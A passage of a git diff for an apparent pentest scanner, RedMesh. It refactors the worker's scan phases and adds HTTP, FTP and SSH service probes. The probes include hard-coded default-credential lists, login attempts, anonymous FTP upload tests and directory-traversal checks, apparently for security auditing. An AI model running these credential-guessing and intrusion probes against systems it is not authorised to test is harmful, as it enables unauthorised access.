def _interruptible_sleep(self): """ @@ -382,6 +380,43 @@ def _interruptible_sleep(self): # Check if stop was requested during sleep return self.stop_event.is_set() + def _execute_phase(self, phase_config): + """Execute one worker phase with standardized metrics and completion handling.""" + if self._check_stopped(): + return + if phase_config.get("skip_on_ics") and self._ics_detected: + return + + phase_name = phase_config["phase"] + runner = getattr(self, phase_config["runner"]) + self.metrics.phase_start(phase_name) + try: + runner() + finally: + self.metrics.phase_end(phase_name) + + completion_marker = phase_config.get("completion_marker") + if completion_marker: + self.state["completed_tests"].append(completion_marker) + + def _run_correlation_tests(self): + """Execute enabled correlation probes in explicit registry order.""" + enabled_methods = self._get_enabled_feature_methods(category="correlation") + enabled_set = set(enabled_methods) + + for method in self.get_feature_registry().get("correlation", []): + if method not in enabled_set: + self.metrics.record_probe(method, "skipped:disabled") + + for method in enabled_methods: + if self.stop_event.is_set(): + return + try: + getattr(self, method)() + self.metrics.record_probe(method, "completed") + except Exception as exc: + self.P(f"Correlation probe {method} failed: {exc}", color='r') + self.metrics.record_probe(method, "failed") def execute_job(self): """ @@ -395,35 +430,8 @@ def execute_job(self): try: self.P(f"Starting pentest job.") self.metrics.start_scan(len(self.initial_ports)) - - if not self._check_stopped(): - self.metrics.phase_start("port_scan") - self._scan_ports_step() - self.metrics.phase_end("port_scan") - - if not self._check_stopped(): - self.metrics.phase_start("fingerprint") - self._active_fingerprint_ports() - self.metrics.phase_end("fingerprint") - self.state["completed_tests"].append("fingerprint_completed") - - if not self._check_stopped(): - 
self.metrics.phase_start("service_probes") - self._gather_service_info() - self.metrics.phase_end("service_probes") - self.state["completed_tests"].append("service_info_completed") - - if not self._check_stopped() and not self._ics_detected: - self.metrics.phase_start("web_tests") - self._run_web_tests() - self.metrics.phase_end("web_tests") - self.state["completed_tests"].append("web_tests_completed") - - if not self._check_stopped(): - self.metrics.phase_start("correlation") - self._post_scan_correlate() - self.metrics.phase_end("correlation") - self.state["completed_tests"].append("correlation_completed") + for phase_config in self.PHASE_EXECUTION_PLAN: + self._execute_phase(phase_config) self.state['done'] = True self.P(f"Job completed. Ports open and checked: {self.state['open_ports']}") @@ -933,7 +941,7 @@ def _gather_service_info(self): return self.P(f"Gathering service info for {len(open_ports)} open ports.") target = self.target - service_info_methods = [m for m in self.__enabled_features if m.startswith("_service_info_")] + service_info_methods = self._get_enabled_feature_methods(category="service") port_protocols = self.state.get("port_protocols", {}) aggregated_info = [] for method in service_info_methods: @@ -943,6 +951,7 @@ def _gather_service_info(self): func = getattr(self, method) target_protocols = PROBE_PROTOCOL_MAP.get(method) # None → run unconditionally method_info = [] + method_failed = False for port in open_ports: if self.stop_event.is_set(): return @@ -952,7 +961,12 @@ def _gather_service_info(self): port_proto = port_protocols.get(port, "unknown") if port_proto not in target_protocols: continue - info = func(target, port) + try: + info = func(target, port) + except Exception as exc: + method_failed = True + self.P(f"Service probe {method} failed on port {port}: {exc}", color='r') + continue if info is not None: if port not in self.state["service_info"]: self.state["service_info"][port] = {} @@ -993,7 +1007,7 @@ def 
_gather_service_info(self): f"Method {method} findings:\n{json.dumps(method_info, indent=2)}" ) self.state["completed_tests"].append(method) - self.metrics.record_probe(method, "completed") + self.metrics.record_probe(method, "failed" if method_failed else "completed") # end for each method return aggregated_info @@ -1027,13 +1041,19 @@ def _run_web_tests(self): ) target = self.target result = [] - web_tests_methods = [m for m in self.__enabled_features if m.startswith("_web_test_")] + web_tests_methods = self._get_enabled_feature_methods(category="web") for method in web_tests_methods: func = getattr(self, method) + method_failed = False for port in ports_to_test: if self.stop_event.is_set(): return - iter_result = func(target, port) + try: + iter_result = func(target, port) + except Exception as exc: + method_failed = True + self.P(f"Web probe {method} failed on port {port}: {exc}", color='r') + continue if iter_result is not None: result.append(f"{method}:{port} {iter_result}") if port not in self.state["web_tests_info"]: @@ -1050,7 +1070,7 @@ def _run_web_tests(self): return # Stop was requested during sleep # end for each port of current method self.state["completed_tests"].append(method) # register completed method for port - self.metrics.record_probe(method, "completed") + self.metrics.record_probe(method, "failed" if method_failed else "completed") # end for each method self.state["web_tested"] = True return result diff --git a/extensions/business/cybersec/red_mesh/worker/service/__init__.py b/extensions/business/cybersec/red_mesh/worker/service/__init__.py new file mode 100644 index 00000000..2602748c --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/__init__.py @@ -0,0 +1,15 @@ +from ._base import _ServiceProbeBase +from .common import _ServiceCommonMixin +from .database import _ServiceDatabaseMixin +from .infrastructure import _ServiceInfraMixin +from .tls import _ServiceTlsMixin + + +class _ServiceInfoMixin( + _ServiceCommonMixin, 
+ _ServiceDatabaseMixin, + _ServiceInfraMixin, + _ServiceTlsMixin, +): + """Combined service probes mixin.""" + pass diff --git a/extensions/business/cybersec/red_mesh/worker/service/_base.py b/extensions/business/cybersec/red_mesh/worker/service/_base.py new file mode 100644 index 00000000..383f55b2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/_base.py @@ -0,0 +1,25 @@ +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves + + +class _ServiceProbeBase: + """ + Base mixin providing shared utilities for service probe sub-mixins. + + Subclasses inherit ``_emit_metadata`` for recording scan metadata and + have direct access to the ``findings``, ``cve_db`` helpers via module- + level imports. + """ + + def _emit_metadata(self, category, key_or_item, value=None): + """Safely append to scan_metadata sub-dicts without crashing if state is uninitialized.""" + meta = self.state.get("scan_metadata") + if meta is None: + return + bucket = meta.get(category) + if bucket is None: + return + if isinstance(bucket, dict): + bucket[key_or_item] = value + elif isinstance(bucket, list): + bucket.append(key_or_item) diff --git a/extensions/business/cybersec/red_mesh/worker/service/common.py b/extensions/business/cybersec/red_mesh/worker/service/common.py new file mode 100644 index 00000000..4b32f601 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/common.py @@ -0,0 +1,1716 @@ +import random +import re as _re +import socket +import struct +import ftplib +import requests +import ssl +from datetime import datetime + +import paramiko + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + +# Default credentials commonly found on exposed SSH services. +# Kept intentionally small — this is a quick check, not a brute-force. 
+_SSH_DEFAULT_CREDS = [ + ("root", "root"), + ("root", "toor"), + ("root", "password"), + ("admin", "admin"), + ("admin", "password"), + ("user", "user"), + ("test", "test"), +] + +# Default credentials for FTP services. +_FTP_DEFAULT_CREDS = [ + ("root", "root"), + ("admin", "admin"), + ("admin", "password"), + ("ftp", "ftp"), + ("user", "user"), + ("test", "test"), +] + +# Default credentials for Telnet services. +_TELNET_DEFAULT_CREDS = [ + ("root", "root"), + ("root", "toor"), + ("root", "password"), + ("admin", "admin"), + ("admin", "password"), + ("user", "user"), + ("test", "test"), +] + +_HTTP_SERVER_RE = _re.compile( + r'(Apache|nginx)[/ ]+(\d+(?:\.\d+)+)', _re.IGNORECASE, +) +_HTTP_PRODUCT_MAP = {'apache': 'apache', 'nginx': 'nginx'} + + +class _ServiceCommonMixin(_ServiceProbeBase): + """HTTP, FTP, SSH, SMTP, Telnet and Rsync service probes.""" + + def _service_info_http(self, target, port): # default port: 80 + """ + Assess HTTP service: server fingerprint, technology detection, + dangerous HTTP methods, and page title extraction. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + import re as _re + + findings = [] + scheme = "https" if port in (443, 8443) else "http" + url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" + + result = { + "banner": None, + "server": None, + "title": None, + "technologies": [], + "dangerous_methods": [], + } + + # --- 1. 
GET request — banner, server, title, tech fingerprint ---
+    try:
+      self.P(f"Fetching {url} for banner...")
+      ua = getattr(self, 'scanner_user_agent', '')
+      headers = {'User-Agent': ua} if ua else {}
+      resp = requests.get(url, timeout=5, verify=False, allow_redirects=True, headers=headers)
+
+      result["banner"] = f"HTTP {resp.status_code} {resp.reason}"
+      result["server"] = resp.headers.get("Server")
+      if result["server"]:
+        self._emit_metadata("server_versions", port, result["server"])
+      if result["server"]:
+        _m = _HTTP_SERVER_RE.search(result["server"])
+        if _m:
+          _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower())
+          if _cve_product:
+            findings += check_cves(_cve_product, _m.group(2))
+      powered_by = resp.headers.get("X-Powered-By")
+
+      # Page title
+      title_match = _re.search(
+        r"<title>(.*?)</title>", resp.text[:5000], _re.IGNORECASE | _re.DOTALL
+      )
+      if title_match:
+        result["title"] = title_match.group(1).strip()[:100]
+
+      # Technology fingerprinting
+      body_lower = resp.text[:8000].lower()
+      tech_signatures = {
+        "WordPress": ["wp-content", "wp-includes"],
+        "Joomla": ["com_content", "/media/jui/"],
+        "Drupal": ["drupal.js", "sites/default/files"],
+        "Django": ["csrfmiddlewaretoken"],
+        "PHP": [".php", "phpsessid"],
+        "ASP.NET": ["__viewstate", ".aspx"],
+        "React": ["_next/", "__next_data__", "react"],
+      }
+      techs = []
+      if result["server"]:
+        techs.append(result["server"])
+      if powered_by:
+        techs.append(powered_by)
+      for tech, markers in tech_signatures.items():
+        if any(m in body_lower for m in markers):
+          techs.append(tech)
+      result["technologies"] = techs
+
+    except Exception as e:
+      # HTTP library failed (e.g. empty reply, connection reset).
+      # Fall back to raw socket probe — try HTTP/1.0 without Host header
+      # (some servers like nginx drop requests with unrecognized Host values).
+ try: + _s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + _s.settimeout(3) + _s.connect((target, port)) + # Use HTTP/1.0 without Host — matches nmap's GetRequest probe + _s.send(b"GET / HTTP/1.0\r\n\r\n") + _raw = b"" + while True: + chunk = _s.recv(4096) + if not chunk: + break + _raw += chunk + if len(_raw) > 16384: + break + _s.close() + _raw_str = _raw.decode("utf-8", errors="ignore") + if _raw_str: + lines = _raw_str.split("\r\n") + result["banner"] = lines[0].strip() if lines else "unknown" + for line in lines[1:]: + low = line.lower() + if low.startswith("server:"): + result["server"] = line.split(":", 1)[1].strip() + break + # Report that the server drops Host-header requests + findings.append(Finding( + severity=Severity.INFO, + title="HTTP service drops requests with Host header", + description=f"TCP port {port} returns empty replies for standard HTTP/1.1 " + "requests but responds to HTTP/1.0 without a Host header. " + "This indicates a server_name mismatch or intentional filtering.", + evidence=f"HTTP/1.1 with Host:{target} → empty reply; " + f"HTTP/1.0 without Host → {result['banner']}", + remediation="Configure a proper default server block or virtual host.", + cwe_id="CWE-200", + confidence="certain", + )) + # Check for directory listing in response body + body_start = _raw_str.find("\r\n\r\n") + if body_start > -1: + body = _raw_str[body_start + 4:] + if "directory listing" in body.lower() or "
index of" in body.lower():
+              findings.append(Finding(
+                severity=Severity.MEDIUM,
+                title="HTTP directory listing exposed",
+                description=f"TCP port {port} returns a directory listing in its response body.",
+                evidence="Response body contains directory-listing markers.",
+                remediation="Disable automatic directory indexing on the web server.",
+                owasp_id="A05:2021",
+                cwe_id="CWE-548",
+                confidence="firm",
+              ))
+            title_m = _re.search(r"<title>(.*?)</title>", body[:5000], _re.IGNORECASE | _re.DOTALL)
+            if title_m:
+              result["title"] = title_m.group(1).strip()[:100]
+        else:
+          result["banner"] = "(empty reply)"
+          findings.append(Finding(
+            severity=Severity.INFO,
+            title="HTTP service returns empty reply",
+            description=f"TCP port {port} accepts connections but the server "
+                        "closes without sending any HTTP response data.",
+            evidence=f"Raw socket to {target}:{port} — connected OK, received 0 bytes.",
+            remediation="Investigate why the server sends empty replies; "
+                        "verify proxy/upstream configuration.",
+            cwe_id="CWE-200",
+            confidence="certain",
+          ))
+      except Exception:
+        return probe_error(target, port, "HTTP", e)
+      return probe_result(raw_data=result, findings=findings)
+
+    # --- 2. Dangerous HTTP methods ---
+    dangerous = []
+    for method in ("TRACE", "PUT", "DELETE"):
+      try:
+        r = requests.request(method, url, timeout=3, verify=False)
+        if r.status_code < 400:
+          dangerous.append(method)
+      except Exception:
+        pass
+
+    result["dangerous_methods"] = dangerous
+    if "TRACE" in dangerous:
+      findings.append(Finding(
+        severity=Severity.MEDIUM,
+        title="HTTP TRACE method enabled (cross-site tracing / XST attack vector).",
+        description="TRACE echoes request bodies back, enabling cross-site tracing attacks.",
+        evidence=f"TRACE {url} returned status < 400.",
+        remediation="Disable the TRACE method in the web server configuration.",
+        owasp_id="A05:2021",
+        cwe_id="CWE-693",
+        confidence="certain",
+      ))
+    if "PUT" in dangerous:
+      findings.append(Finding(
+        severity=Severity.HIGH,
+        title="HTTP PUT method enabled (potential unauthorized file upload).",
+        description="The PUT method allows uploading files to the server.",
+        evidence=f"PUT {url} returned status < 400.",
+        remediation="Disable the PUT method or restrict it to authenticated users.",
+        owasp_id="A01:2021",
+        cwe_id="CWE-749",
+        confidence="certain",
+      ))
+    if "DELETE" in dangerous:
+      findings.append(Finding(
+        severity=Severity.HIGH,
+        title="HTTP
DELETE method enabled (potential unauthorized file deletion).", + description="The DELETE method allows removing resources from the server.", + evidence=f"DELETE {url} returned status < 400.", + remediation="Disable the DELETE method or restrict it to authenticated users.", + owasp_id="A01:2021", + cwe_id="CWE-749", + confidence="certain", + )) + + return probe_result(raw_data=result, findings=findings) + + + def _service_info_http_alt(self, target, port): # default port: 8080 + """ + Probe alternate HTTP port 8080 for verbose banners. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + # Skip standard HTTP ports — they are covered by _service_info_http. + if port in (80, 443): + return None + + findings = [] + raw = {"banner": None, "server": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + ua = getattr(self, 'scanner_user_agent', '') + ua_header = f"\r\nUser-Agent: {ua}" if ua else "" + msg = "HEAD / HTTP/1.1\r\nHost: {}{}\r\n\r\n".format(target, ua_header).encode('utf-8') + sock.send(bytes(msg)) + data = sock.recv(1024).decode('utf-8', errors='ignore') + sock.close() + + if data: + # Extract status line and Server header instead of dumping raw bytes + lines = data.split("\r\n") + status_line = lines[0].strip() if lines else "unknown" + raw["banner"] = status_line + for line in lines[1:]: + if line.lower().startswith("server:"): + raw["server"] = line.split(":", 1)[1].strip() + break + + # NOTE: CVE matching intentionally omitted here — _service_info_http + # already handles CVE lookups for all HTTP ports. Emitting them here + # caused duplicate findings on non-standard ports (batch 3 dedup fix). 
+ except Exception as e: + return probe_error(target, port, "HTTP-ALT", e) + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_https(self, target, port): # default port: 443 + """ + Collect HTTPS response banner data for TLS services. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None, "server": None} + try: + url = f"https://{target}" + if port != 443: + url = f"https://{target}:{port}" + self.P(f"Fetching {url} for banner...") + ua = getattr(self, 'scanner_user_agent', '') + headers = {'User-Agent': ua} if ua else {} + resp = requests.get(url, timeout=3, verify=False, headers=headers) + raw["banner"] = f"HTTPS {resp.status_code} {resp.reason}" + raw["server"] = resp.headers.get("Server") + if raw["server"]: + _m = _HTTP_SERVER_RE.search(raw["server"]) + if _m: + _cve_product = _HTTP_PRODUCT_MAP.get(_m.group(1).lower()) + if _cve_product: + findings += check_cves(_cve_product, _m.group(2)) + findings.append(Finding( + severity=Severity.INFO, + title=f"HTTPS service detected ({resp.status_code} {resp.reason})", + description=f"HTTPS service on {target}:{port}.", + evidence=f"Server: {raw['server'] or 'not disclosed'}", + confidence="certain", + )) + except Exception as e: + return probe_error(target, port, "HTTPS", e) + return probe_result(raw_data=raw, findings=findings) + + + # Default credentials for HTTP Basic Auth testing + _HTTP_BASIC_CREDS = [ + ("admin", "admin"), ("admin", "password"), ("admin", "1234"), + ("root", "root"), ("root", "password"), ("root", "toor"), + ("user", "user"), ("test", "test"), ("guest", "guest"), + ("admin", ""), ("tomcat", "tomcat"), ("manager", "manager"), + ] + + def _service_info_http_basic_auth(self, target, port): + """ + Test HTTP Basic Auth endpoints for default/weak credentials. 
+ + Only runs when the target responds with 401 + WWW-Authenticate: Basic. + Tests a small set of default credential pairs. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict or None + Structured findings, or None if no Basic Auth detected. + """ + findings = [] + raw = {"basic_auth_detected": False, "tested": 0, "accepted": []} + scheme = "https" if port in (443, 8443) else "http" + base_url = f"{scheme}://{target}" if port in (80, 443) else f"{scheme}://{target}:{port}" + + # Probe / and /admin for 401 + Basic auth + auth_url = None + realm = None + for path in ("/", "/admin", "/manager"): + try: + resp = requests.get(base_url + path, timeout=3, verify=False) + if resp.status_code == 401: + www_auth = resp.headers.get("WWW-Authenticate", "") + if "Basic" in www_auth: + auth_url = base_url + path + realm_match = _re.search(r'realm="?([^"]*)"?', www_auth, _re.IGNORECASE) + realm = realm_match.group(1) if realm_match else "unknown" + break + except Exception: + continue + + if not auth_url: + return None # No Basic auth detected — skip entirely + + raw["basic_auth_detected"] = True + raw["realm"] = realm + + # Test credentials + consecutive_401 = 0 + for username, password in self._HTTP_BASIC_CREDS: + try: + resp = requests.get(auth_url, timeout=3, verify=False, auth=(username, password)) + raw["tested"] += 1 + + if resp.status_code == 429: + break # rate limited — stop + + if resp.status_code == 200 or resp.status_code == 301 or resp.status_code == 302: + cred_str = f"{username}:{password}" if password else f"{username}:(empty)" + raw["accepted"].append(cred_str) + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"HTTP Basic Auth default credential: {cred_str}", + description=f"The web server at {auth_url} (realm: {realm}) accepted a default credential.", + evidence=f"GET {auth_url} with {cred_str} → HTTP {resp.status_code}", + remediation="Change default credentials 
immediately.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + elif resp.status_code == 401: + consecutive_401 += 1 + except Exception: + break + + # No rate limiting after all attempts + if consecutive_401 >= len(self._HTTP_BASIC_CREDS) - 1: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"HTTP Basic Auth has no rate limiting ({raw['tested']} attempts accepted)", + description="The server does not rate-limit failed authentication attempts.", + evidence=f"{consecutive_401} consecutive 401 responses without rate limiting.", + remediation="Implement account lockout or rate limiting for failed auth attempts.", + owasp_id="A07:2021", + cwe_id="CWE-307", + confidence="firm", + )) + + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_ftp(self, target, port): # default port: 21 + """ + Assess FTP service security: banner, anonymous access, default creds, + server fingerprint, TLS support, write access, and credential validation. + + Checks performed (in order): + + 1. Banner grab and SYST/FEAT fingerprint. + 2. Anonymous login attempt. + 3. Write access test (STOR) after anonymous login. + 4. Directory listing and traversal. + 5. TLS support check (AUTH TLS). + 6. Default credential check. + 7. Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with banner, vulnerabilities, server_info, etc. 
+ """ + findings = [] + result = { + "banner": None, + "server_type": None, + "features": [], + "anonymous_access": False, + "write_access": False, + "tls_supported": False, + "accepted_credentials": [], + "directory_listing": None, + } + + def _ftp_connect(user=None, passwd=None): + """Open a fresh FTP connection and optionally login.""" + ftp = ftplib.FTP(timeout=5) + ftp.connect(target, port, timeout=5) + if user is not None: + ftp.login(user, passwd or "") + return ftp + + # --- 1. Banner grab --- + try: + ftp = _ftp_connect() + result["banner"] = ftp.getwelcome() + except Exception as e: + return probe_error(target, port, "FTP", e) + + # FTP server version CVE check + _ftp_m = _re.search( + r'(ProFTPD|vsftpd)[/ ]+(\d+(?:\.\d+)+)', + result["banner"], _re.IGNORECASE, + ) + if _ftp_m: + _cve_product = {'proftpd': 'proftpd', 'vsftpd': 'vsftpd'}.get(_ftp_m.group(1).lower()) + if _cve_product: + findings += check_cves(_cve_product, _ftp_m.group(2)) + + # --- 2. Anonymous login --- + try: + resp = ftp.login() + result["anonymous_access"] = True + findings.append(Finding( + severity=Severity.HIGH, + title="FTP allows anonymous login.", + description="The FTP server permits unauthenticated access via anonymous login.", + evidence="Anonymous login succeeded.", + remediation="Disable anonymous FTP access unless explicitly required.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + except Exception: + # Anonymous failed — close and move on to credential tests + try: + ftp.quit() + except Exception: + pass + ftp = None + + # --- 2b. SYST / FEAT (after login — some servers require auth first) --- + if ftp: + try: + syst = ftp.sendcmd("SYST") + result["server_type"] = syst + except Exception: + pass + + try: + feat_resp = ftp.sendcmd("FEAT") + feats = [ + line.strip() for line in feat_resp.split("\n") + if line.strip() and not line.startswith("211") + ] + result["features"] = feats + except Exception: + pass + + # --- 2c. 
PASV IP leak check --- + if ftp and result["anonymous_access"]: + try: + pasv_resp = ftp.sendcmd("PASV") + _pasv_match = _re.search(r'\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)', pasv_resp) + if _pasv_match: + pasv_ip = f"{_pasv_match.group(1)}.{_pasv_match.group(2)}.{_pasv_match.group(3)}.{_pasv_match.group(4)}" + if pasv_ip != target: + import ipaddress as _ipaddress + try: + if _ipaddress.ip_address(pasv_ip).is_private: + result["pasv_ip"] = pasv_ip + self._emit_metadata("internal_ips", {"ip": pasv_ip, "source": f"ftp_pasv:{port}"}) + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"FTP PASV leaks internal IP: {pasv_ip}", + description=f"PASV response reveals RFC1918 address {pasv_ip}, different from target {target}.", + evidence=f"PASV response: {pasv_resp}", + remediation="Configure FTP passive address masquerading to use the public IP.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + except (ValueError, TypeError): + pass + except Exception: + pass + + # --- 3. Write access test (only if anonymous login succeeded) --- + if ftp and result["anonymous_access"]: + import io + try: + ftp.set_pasv(True) + test_data = io.BytesIO(b"RedMesh write access probe") + resp = ftp.storbinary("STOR __redmesh_probe.txt", test_data) + if resp and resp.startswith("226"): + result["write_access"] = True + findings.append(Finding( + severity=Severity.CRITICAL, + title="FTP anonymous write access enabled (file upload possible).", + description="Anonymous users can upload files to the FTP server.", + evidence="STOR command succeeded with anonymous session.", + remediation="Remove write permissions for anonymous FTP users.", + owasp_id="A01:2021", + cwe_id="CWE-434", + confidence="certain", + )) + try: + ftp.delete("__redmesh_probe.txt") + except Exception: + pass + except Exception: + pass + + # --- 4. 
Directory listing and traversal --- + if ftp: + try: + pwd = ftp.pwd() + files = [] + try: + ftp.retrlines("LIST", files.append) + except Exception: + pass + if files: + result["directory_listing"] = files[:20] + except Exception: + pass + + # Check if CWD allows directory traversal + for test_dir in ["/etc", "/var", ".."]: + try: + resp = ftp.cwd(test_dir) + if resp and (resp.startswith("250") or resp.startswith("200")): + findings.append(Finding( + severity=Severity.HIGH, + title=f"FTP directory traversal: CWD to '{test_dir}' succeeded.", + description="The FTP server allows changing to directories outside the intended root.", + evidence=f"CWD '{test_dir}' returned: {resp}", + remediation="Restrict FTP users to their home directory (chroot).", + owasp_id="A01:2021", + cwe_id="CWE-22", + confidence="certain", + )) + break + except Exception: + pass + try: + ftp.cwd("/") + except Exception: + pass + + if ftp: + try: + ftp.quit() + except Exception: + pass + + # --- 5. TLS support check --- + try: + ftp_tls = _ftp_connect() + resp = ftp_tls.sendcmd("AUTH TLS") + if resp.startswith("234"): + result["tls_supported"] = True + try: + ftp_tls.quit() + except Exception: + pass + except Exception: + if not result["tls_supported"]: + findings.append(Finding( + severity=Severity.MEDIUM, + title="FTP does not support TLS encryption (cleartext credentials).", + description="Credentials and data are transmitted in cleartext over the network.", + evidence="AUTH TLS command rejected or not supported.", + remediation="Enable FTPS (AUTH TLS) or migrate to SFTP.", + owasp_id="A02:2021", + cwe_id="CWE-319", + confidence="certain", + )) + + # --- 6. 
Default credential check --- + for user, passwd in _FTP_DEFAULT_CREDS: + try: + ftp_cred = _ftp_connect(user, passwd) + result["accepted_credentials"].append(f"{user}:{passwd}") + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"FTP default credential accepted: {user}:{passwd}", + description="The FTP server accepted a well-known default credential.", + evidence=f"Accepted credential: {user}:{passwd}", + remediation="Change default passwords and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + try: + ftp_cred.quit() + except Exception: + pass + except (ftplib.error_perm, ftplib.error_reply): + pass + except Exception: + pass + + # --- 7. Arbitrary credential acceptance test --- + import string as _string + ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) + rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) + try: + ftp_rand = _ftp_connect(ruser, rpass) + findings.append(Finding( + severity=Severity.CRITICAL, + title="FTP accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {ruser}:{rpass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + try: + ftp_rand.quit() + except Exception: + pass + except (ftplib.error_perm, ftplib.error_reply): + pass + except Exception: + pass + + return probe_result(raw_data=result, findings=findings) + + def _service_info_ssh(self, target, port): # default port: 22 + """ + Assess SSH service security: banner, auth methods, and default credentials. + + Checks performed (in order): + + 1. Banner grab — fingerprint server version. + 2. Auth method enumeration — identify if password auth is enabled. + 3. Default credential check — try a small list of common creds. + 4. 
Arbitrary credential acceptance test. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings with banner, auth_methods, and vulnerabilities. + """ + findings = [] + result = { + "banner": None, + "auth_methods": [], + } + + # --- 1. Banner grab (raw socket) --- + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + banner = sock.recv(1024).decode("utf-8", errors="ignore").strip() + sock.close() + result["banner"] = banner + # Emit OS claim from SSH banner (e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu") + _os_match = _re.search(r'(Ubuntu|Debian|Fedora|CentOS|Alpine|FreeBSD)', banner, _re.IGNORECASE) + if _os_match: + self._emit_metadata("os_claims", f"ssh:{port}", _os_match.group(1)) + except Exception as e: + return probe_error(target, port, "SSH", e) + + # --- 2. Auth method enumeration via paramiko Transport --- + try: + transport = paramiko.Transport((target, port)) + transport.connect() + try: + transport.auth_none("") + except paramiko.BadAuthenticationType as e: + result["auth_methods"] = list(e.allowed_types) + except paramiko.AuthenticationException: + result["auth_methods"] = ["unknown"] + finally: + transport.close() + except Exception as e: + self.P(f"SSH auth enumeration failed on {target}:{port}: {e}", color='y') + + if "password" in result["auth_methods"]: + findings.append(Finding( + severity=Severity.MEDIUM, + title="SSH password authentication is enabled (prefer key-based auth).", + description="The SSH server allows password-based login, which is susceptible to brute-force attacks.", + evidence=f"Auth methods: {', '.join(result['auth_methods'])}", + remediation="Disable PasswordAuthentication in sshd_config and use key-based auth.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + + # --- 3. 
Default credential check --- + accepted_creds = [] + + for username, password in _SSH_DEFAULT_CREDS: + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect( + target, port=port, + username=username, password=password, + timeout=3, auth_timeout=3, + look_for_keys=False, allow_agent=False, + ) + accepted_creds.append(f"{username}:{password}") + client.close() + except paramiko.AuthenticationException: + continue + except Exception: + break # connection issue, stop trying + + # --- 4. Arbitrary credential acceptance test --- + random_user = f"probe_{random.randint(10000, 99999)}" + random_pass = f"rnd_{random.randint(10000, 99999)}" + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect( + target, port=port, + username=random_user, password=random_pass, + timeout=3, auth_timeout=3, + look_for_keys=False, allow_agent=False, + ) + findings.append(Finding( + severity=Severity.CRITICAL, + title="SSH accepts arbitrary credentials", + description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", + evidence=f"Accepted random creds {random_user}:{random_pass}", + remediation="Investigate immediately — authentication is non-functional.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + client.close() + except paramiko.AuthenticationException: + pass + except Exception: + pass + + if accepted_creds: + result["accepted_credentials"] = accepted_creds + for cred in accepted_creds: + findings.append(Finding( + severity=Severity.CRITICAL, + title=f"SSH default credential accepted: {cred}", + description=f"The SSH server accepted a well-known default credential.", + evidence=f"Accepted credential: {cred}", + remediation="Change default passwords immediately and enforce strong credential policies.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + + # --- 5. 
Cipher/KEX audit --- + cipher_findings, weak_labels = self._ssh_check_ciphers(target, port) + findings += cipher_findings + result["weak_algorithms"] = weak_labels + + # --- 6. CVE check on banner version --- + if result["banner"]: + ssh_lib, ssh_version = self._ssh_identify_library(result["banner"]) + if ssh_lib and ssh_version: + result["ssh_library"] = ssh_lib + result["ssh_version"] = ssh_version + findings += check_cves(ssh_lib, ssh_version) + + # --- 7. libssh auth bypass (CVE-2018-10933) --- + if ssh_lib == "libssh": + bypass = self._ssh_check_libssh_bypass(target, port) + if bypass: + findings.append(bypass) + + return probe_result(raw_data=result, findings=findings) + + # Patterns: (regex, product_name_for_cve_db) + _SSH_LIBRARY_PATTERNS = [ + (_re.compile(r'OpenSSH[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "openssh"), + (_re.compile(r'libssh[_\s-](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "libssh"), + (_re.compile(r'dropbear[_\s](\d+(?:\.\d+)*)', _re.IGNORECASE), "dropbear"), + (_re.compile(r'paramiko[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "paramiko"), + (_re.compile(r'Erlang[/\s](?:OTP[_/\s]*)?(\d+\.\d+(?:\.\d+)*)', _re.IGNORECASE), "erlang_ssh"), + ] + + def _ssh_identify_library(self, banner): + """Identify SSH library and version from banner string. + + Returns + ------- + tuple[str | None, str | None] + 